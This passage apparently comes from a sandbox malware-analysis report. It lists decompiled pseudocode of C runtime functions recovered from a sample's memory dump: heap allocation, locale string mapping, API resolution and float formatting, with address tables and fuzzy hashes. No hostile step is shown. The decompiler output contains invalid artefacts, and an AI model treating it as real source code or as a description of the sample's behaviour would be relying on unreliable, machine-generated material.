				_v16 = _t37;
				_t6 = _t65 + 0x48; // 0x8bffffc9
				if(_t37 !=  *((intOrPtr*)( *_t6 + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t79 = E013B7210(0x220);
					_t62 = __ebx | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t9 = _a12 + 0x48; // 0x8bffffc9
						_t79 = memcpy(_t79,  *_t9, 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000; // executed
						_t42 = E013B99F3(_t77, __eflags, _v16, _t79); // executed
						_t84 = _t42;
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E013B5BC1();
							}
							asm("lock xadd [eax], ebx");
							_t64 = _t62 == 1;
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x13ca200;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x13ca200) {
									_t17 = _t56 + 0x48; // 0x8bffffc9
									E013B67BB( *_t17);
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x13ca778; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E013B9480(_t64, 0, _t84, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x13ca1f4 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E013B674B(__eflags))) = 0x16;
							goto L5;
						}
					}
					E013B67BB(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x013b97e4
0x013b97ec
0x013b97ef
0x013b97f2
0x013b97fa
0x013b97ff
0x013b9805
0x013b9808
0x013b980e
0x013b9814
0x013b9815
0x013b9816
0x013b9821
0x013b9823
0x013b9827
0x013b9829
0x013b9859
0x013b9859
0x013b982b
0x013b9833
0x013b9838
0x013b983e
0x013b9841
0x013b9846
0x013b984a
0x013b984c
0x013b9869
0x013b986d
0x013b986f
0x013b986f
0x013b987a
0x013b987e
0x013b987e
0x013b987f
0x013b9881
0x013b9884
0x013b988b
0x013b988d
0x013b9890
0x013b9895
0x013b988b
0x013b9896
0x013b989c
0x013b98a1
0x013b98a3
0x013b98a9
0x013b98ae
0x013b98b4
0x013b98b9
0x013b98c4
0x013b98c7
0x013b98c8
0x013b98cb
0x013b98d1
0x013b98d5
0x013b98d9
0x013b98da
0x013b98df
0x013b98e3
0x013b98ee
0x013b98ee
0x013b98e3
0x013b984e
0x013b9853
0x00000000
0x013b9853
0x013b984c
0x013b985c
0x013b9868
0x013b9810
0x013b9813
0x013b9813

APIs

Part of subcall function 013B958E: GetOEMCP.KERNEL32(00000000,013B97FF,?,013B729E,013B63B0,013B63B0,013B729E,?,?), ref: 013B95B9

_free.LIBCMT ref: 013B985C

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1121805853c56e503950d7160756d7016ae48b22228a107bb0a8a990ce7c54f4
Instruction ID: ada319ebf4c03c77262ca08527fe087e9b6c8da22b954e92bd8fa364cf881a36
Opcode Fuzzy Hash: 1121805853c56e503950d7160756d7016ae48b22228a107bb0a8a990ce7c54f4
Instruction Fuzzy Hash: 99316DB190020AAFDB11DFACD8C0BDA7BB5EF44318F15046AEB15EB691FB329951CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013B6BAD Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E013B6BAD(intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _t20;
				intOrPtr* _t22;

				_t22 = E013B6829();
				if(_t22 == 0) {
					return LCMapStringW(E013B6C0A(_a4, 0), _a8, _a12, _a16, _a20, _a24);
				}
				 *0x13c310c(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
				_t20 =  *_t22(); // executed
				return _t20;
			}

0x013b6bb8
0x013b6bbc
0x00000000
0x013b6bff
0x013b6bdb
0x013b6be1
0x00000000

APIs

LCMapStringEx.KERNELBASE(?,013BEB90,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 013B6BE1
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,013BEB90,?,?,00000000,?,00000000), ref: 013B6BFF

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 562479a582c459ffeccaaf6c7724bc232e218203ff45fdb73a3fdafee1be0568
Instruction ID: d9426cf2742ce62ac807cb555a0f861075274f3ff407473edef2afde4f7d7057
Opcode Fuzzy Hash: 562479a582c459ffeccaaf6c7724bc232e218203ff45fdb73a3fdafee1be0568
Instruction Fuzzy Hash: 49F0647280021ABBCF126E95ED09DDE3F2AFB583A4F058110FA1965421EB32D831AB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B5500 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E013B5500(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x13d9828 == 0) {
					_push(_t13);
					E013B9998(__ebx); // executed
					_t2 = E013B9E40(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E013B5553(__ebx, _t17);
						if(_t3 != 0) {
							 *0x13d9834 = _t3;
							_t14 = 0;
							 *0x13d9828 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E013B67BB(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E013B67BB(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x013b5507
0x013b550d
0x013b550e
0x013b5513
0x013b5518
0x013b551c
0x013b5524
0x013b552c
0x013b5533
0x013b5538
0x013b553a
0x013b552e
0x013b552e
0x013b552e
0x013b5541
0x013b551e
0x013b551e
0x013b551e
0x013b5548
0x013b5552
0x013b5509
0x013b550b
0x013b550b

APIs

_free.LIBCMT ref: 013B5548

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bc17669b7ef753258263d93c323a5055e756b74df6b9fff7ad840b91babb0419
Instruction ID: 6b95aa9eff4677da4a92c2dfefd637b04b22c449ee77e47198ab10024850eaa6
Opcode Fuzzy Hash: bc17669b7ef753258263d93c323a5055e756b74df6b9fff7ad840b91babb0419
Instruction Fuzzy Hash: 7CE06572506512C1D632263E7CC57EE198B9BD1B3FF16022BDB2AC69C4FE7445428791

Uniqueness

Uniqueness Score: -1.00%

Function 013B6924 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E013B6924(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x13d98d8 + _a4 * 4;
				_t28 =  *0x13ca014; // 0xfcb69da6
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E013B685D(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x13ca014;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E013B5143(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}

0x013b692e
0x013b6938
0x013b693e
0x013b6943
0x013b6945
0x013b6948
0x013b694c
0x013b6954
0x013b6961
0x013b696a
0x013b6989
0x013b698e
0x013b6996
0x013b699e
0x013b69a0
0x013b69a2
0x00000000
0x013b69a2
0x013b6976
0x013b697a
0x00000000
0x00000000
0x013b6983
0x013b6985
0x00000000
0x013b6985
0x00000000
0x013b6956
0x00000000

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36cce149edfe3acc229ae4641e02cb3a7c94208deeec78b1afa1bfc6e7abfd73
Instruction ID: 56d5b7e634d7fad496126c9cdf83e80a3fcb0714f88d54cc510ba8adfca67344
Opcode Fuzzy Hash: 36cce149edfe3acc229ae4641e02cb3a7c94208deeec78b1afa1bfc6e7abfd73
Instruction Fuzzy Hash: 8E0128B37002259FEF26CD2DEC819DA37DAEBC1368B148124FB05CB949FA31D4018791

Uniqueness

Uniqueness Score: -1.00%

Function 013BA2FD Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E013BA2FD(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E013B675E(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E013B6B62(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E013B67BB(0);
				return _t35;
			}

0x013ba303
0x013ba30a
0x013ba30f
0x013ba313
0x013ba31a
0x013ba320
0x013ba320
0x013ba326
0x013ba328
0x013ba32b
0x013ba32b
0x013ba32e
0x013ba330
0x013ba336
0x013ba33a
0x013ba33f
0x013ba343
0x013ba347
0x013ba349
0x013ba34c
0x013ba352
0x013ba359
0x013ba35d
0x013ba360
0x013ba363
0x013ba363
0x013ba367
0x013ba36a
0x013ba31c
0x013ba31c
0x013ba31c
0x013ba36c
0x013ba377

APIs

Part of subcall function 013B675E: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013B7D0C,00000001,00000364,00000002,000000FF,?,?,?,013B6750,013B3FFE,?,?), ref: 013B679F

_free.LIBCMT ref: 013BA36C

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 094a3633f0b88a5760f5c30ac5b20603c6b41eddaa33a7ac0287293e470c654a
Instruction ID: 77b0650eca85e858dd7befdbe5d28446da2a485399804bc3985065cda6ef1ec6
Opcode Fuzzy Hash: 094a3633f0b88a5760f5c30ac5b20603c6b41eddaa33a7ac0287293e470c654a
Instruction Fuzzy Hash: B9014EB26047166BC3218F5CC4C19CAFB98FB05774F040619E659A7AC0F7706811CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 013B675E Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E013B675E(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x13d9cf0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E013B5C55();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E013B674B(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E013B5CA0(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x013b6764
0x013b6769
0x013b6777
0x013b6777
0x013b677d
0x013b677f
0x013b677f
0x013b6796
0x013b679f
0x013b67a7
0x00000000
0x00000000
0x013b6787
0x013b6789
0x013b67ab
0x013b67b0
0x013b67b6
0x00000000
0x013b67b6
0x013b6792
0x013b6794
0x00000000
0x00000000
0x013b6794
0x00000000
0x013b6796
0x013b676f
0x013b6775
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013B7D0C,00000001,00000364,00000002,000000FF,?,?,?,013B6750,013B3FFE,?,?), ref: 013B679F

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b607ab777faacd7c8d2baeec50cbaa9bd23089097ca3236382921df6515bdbb0
Instruction ID: dc35d9feb88d9480e9a219d5fad96e76ee270c4d418960717473f462d51c3f06
Opcode Fuzzy Hash: b607ab777faacd7c8d2baeec50cbaa9bd23089097ca3236382921df6515bdbb0
Instruction Fuzzy Hash: AFF0E9711011356BEF219A2E9CC7FDA3B8DAF81A78F044121AF0597C85FA20E8008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 013BFEC3 Relevance: 1.5, APIs: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E013BFEC3(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t22;

				 *0x13d970c =  *0x13d970c + 1;
				_t22 = _a4;
				_t11 = E013B675E(0x1000, 1); // executed
				 *((intOrPtr*)(_t22 + 4)) = _t11;
				E013B67BB(0);
				if( *((intOrPtr*)(_t22 + 4)) == 0) {
					asm("lock or [eax], ecx");
					_t5 = _t22 + 0x14; // 0x14
					 *((intOrPtr*)(_t22 + 4)) = _t5;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t22 + 0x18)) = 0x1000;
				_t15 =  *((intOrPtr*)(_t22 + 4));
				 *(_t22 + 8) =  *(_t22 + 8) & 0x00000000;
				 *_t22 = _t15;
				return _t15;
			}

0x013bfec8
0x013bfecf
0x013bfedb
0x013bfee2
0x013bfee5
0x013bfef4
0x013bff03
0x013bff06
0x013bff0b
0x013bff0e
0x013bfef6
0x013bfef6
0x013bfef9
0x013bfef9
0x013bff0f
0x013bff12
0x013bff15
0x013bff1a
0x013bff1e

APIs

Part of subcall function 013B675E: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013B7D0C,00000001,00000364,00000002,000000FF,?,?,?,013B6750,013B3FFE,?,?), ref: 013B679F

_free.LIBCMT ref: 013BFEE5

Part of subcall function 013B67BB: HeapFree.KERNEL32(00000000,00000000,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?), ref: 013B67D1
Part of subcall function 013B67BB: GetLastError.KERNEL32(?,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?,?), ref: 013B67E3

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 82dd4234478b6fffa4d36aca3dd10d13f2bde2668a7e3e05fc27b8fddb147c65
Instruction ID: cedb96561eedee62dc588bc643d958907ab809a4c873689a7ab919a0427be72f
Opcode Fuzzy Hash: 82dd4234478b6fffa4d36aca3dd10d13f2bde2668a7e3e05fc27b8fddb147c65
Instruction Fuzzy Hash: 28F06DB25017049FE3219F49D942B92B7FCEF90B15F10842EE79A8BA91E7B4A445CB84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013BCC58 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E013BCC58(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				char _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				intOrPtr _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1928;
				char _v1932;
				signed int _v1940;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t792;
				intOrPtr _t802;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t820;
				signed int _t822;
				signed int _t829;
				void* _t833;
				signed int _t834;
				intOrPtr _t840;
				void* _t841;
				signed int _t847;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t857;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t871;
				signed int _t874;
				signed int _t877;
				signed int _t883;
				signed int _t884;
				signed int _t892;
				signed int _t895;
				signed int _t900;
				char* _t903;
				signed int _t907;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				char* _t922;
				signed char _t925;
				signed int _t931;
				signed int _t933;
				signed int _t937;
				signed int _t940;
				signed int _t948;
				signed int _t951;
				signed int _t953;
				signed int _t956;
				signed int _t965;
				signed int _t966;
				signed int _t969;
				signed int _t982;
				signed int _t983;
				signed int _t984;
				signed int _t985;
				signed int* _t986;
				signed char _t989;
				signed int* _t992;
				signed int _t995;
				signed int _t997;
				signed int _t1001;
				signed int _t1004;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1021;
				signed int _t1030;
				intOrPtr _t1035;
				signed int _t1036;
				signed int _t1042;
				void* _t1050;
				signed int _t1051;
				signed int _t1052;
				signed int _t1053;
				signed int _t1056;
				signed int _t1064;
				signed int _t1068;
				signed int _t1070;
				signed int _t1075;
				void* _t1081;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				signed int _t1087;
				signed int _t1092;
				signed int _t1093;
				signed int _t1097;
				signed int _t1099;
				signed int _t1104;
				signed char _t1111;
				void* _t1112;
				signed int _t1117;
				intOrPtr* _t1124;
				signed int _t1133;
				signed int _t1134;
				void* _t1136;
				signed int _t1139;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1146;
				signed int _t1150;
				signed int _t1151;
				signed int _t1152;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1167;
				signed int _t1168;
				unsigned int _t1169;
				unsigned int _t1173;
				unsigned int _t1176;
				signed int _t1177;
				signed int _t1180;
				signed int* _t1183;
				signed int _t1186;
				void* _t1188;
				unsigned int _t1189;
				signed int _t1190;
				signed int _t1193;
				signed int* _t1196;
				signed int _t1199;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1208;
				signed int _t1213;
				signed int _t1214;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1228;
				signed int _t1229;
				signed int _t1230;
				signed int _t1232;
				void* _t1233;
				signed int _t1234;
				signed int _t1236;
				signed int _t1241;
				void* _t1245;
				intOrPtr _t1246;
				void* _t1247;
				void* _t1250;
				unsigned int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1265;
				signed int _t1268;
				signed int _t1269;
				signed int _t1270;
				void* _t1271;
				void* _t1274;
				signed int _t1276;
				signed int _t1280;
				signed int _t1282;
				signed int _t1286;
				void* _t1287;
				signed int _t1288;
				void* _t1289;
				signed int _t1291;
				signed int _t1292;
				signed int _t1294;
				void* _t1297;
				signed int _t1299;
				signed int _t1300;
				signed int _t1302;
				signed int _t1303;
				signed int _t1305;
				signed int _t1313;
				signed int _t1315;
				void* _t1316;
				signed int* _t1317;
				signed int* _t1321;
				signed int _t1324;
				signed int _t1333;

				_t1287 = __esi;
				_t1245 = __edi;
				_t1202 = __edx;
				_t1313 = _t1315;
				_t1316 = _t1315 - 0x964;
				_t792 =  *0x13ca014; // 0xfcb69da6
				_v8 = _t792 ^ _t1313;
				_v1928 = _a16;
				_v1896 = _a20;
				_push(__ebx);
				E013BF602(__eflags,  &_v1940);
				_t1111 = 1;
				if((_v1940 & 0x0000001f) != 0x1f) {
					E013BF66A(__eflags,  &_v1940);
					_v1932 = 1;
				} else {
					_v1932 = 0;
				}
				_push(_t1287);
				_t1288 = _a8;
				_push(_t1245);
				_t1246 = 0x20;
				_t1324 = _t1288;
				if(_t1324 > 0 || _t1324 >= 0 && _a4 >= 0) {
					_t802 = _t1246;
				} else {
					_t802 = 0x2d;
				}
				_t1124 = _v1928;
				 *_t1124 = _t802;
				 *((intOrPtr*)(_t1124 + 8)) = _v1896;
				E013B61C9( &_v1944, 0, 0);
				_t1317 = _t1316 + 0xc;
				if((_t1288 & 0x7ff00000) != 0) {
					L14:
					_t809 = E013B7E16( &_a4);
					_pop(_t1127);
					__eflags = _t809;
					if(_t809 != 0) {
						_t1127 = _v1928;
						 *((intOrPtr*)(_v1928 + 4)) = _t1111;
					}
					_t810 = _t809 - 1;
					__eflags = _t810;
					if(_t810 == 0) {
						_t811 = E013B627F(_v1896, _a24, "1#INF");
						__eflags = _t811;
						if(_t811 != 0) {
							goto L311;
						} else {
							_t1111 = 0;
							__eflags = 0;
							goto L308;
						}
					} else {
						_t820 = _t810 - 1;
						__eflags = _t820;
						if(_t820 == 0) {
							_push("1#QNAN");
							goto L12;
						} else {
							_t822 = _t820 - 1;
							__eflags = _t822;
							if(_t822 == 0) {
								_push("1#SNAN");
								goto L12;
							} else {
								__eflags = _t822 == 1;
								if(_t822 == 1) {
									_push("1#IND");
									goto L12;
								} else {
									_v1920 = _v1920 & 0x00000000;
									_a8 = _t1288 & 0x7fffffff;
									_t1333 = _a4;
									asm("fst qword [ebp-0x75c]");
									_t1291 = _v1884;
									_v1916 = _a12 + 1;
									_t1133 = _t1291 >> 0x14;
									_t829 = _t1133 & 0x000007ff;
									__eflags = _t829;
									if(_t829 != 0) {
										_t829 = 0;
										_t1203 = 0x100000;
										_t39 =  &_v1876;
										 *_t39 = _v1876 & 0;
										__eflags =  *_t39;
									} else {
										_t1203 = 0;
										_v1876 = _t1111;
									}
									_t1292 = _t1291 & 0x000fffff;
									_v1912 = _v1888 + _t829;
									asm("adc esi, edx");
									_t1134 = _t1133 & 0x000007ff;
									_v1868 = _v1876 + _t1134;
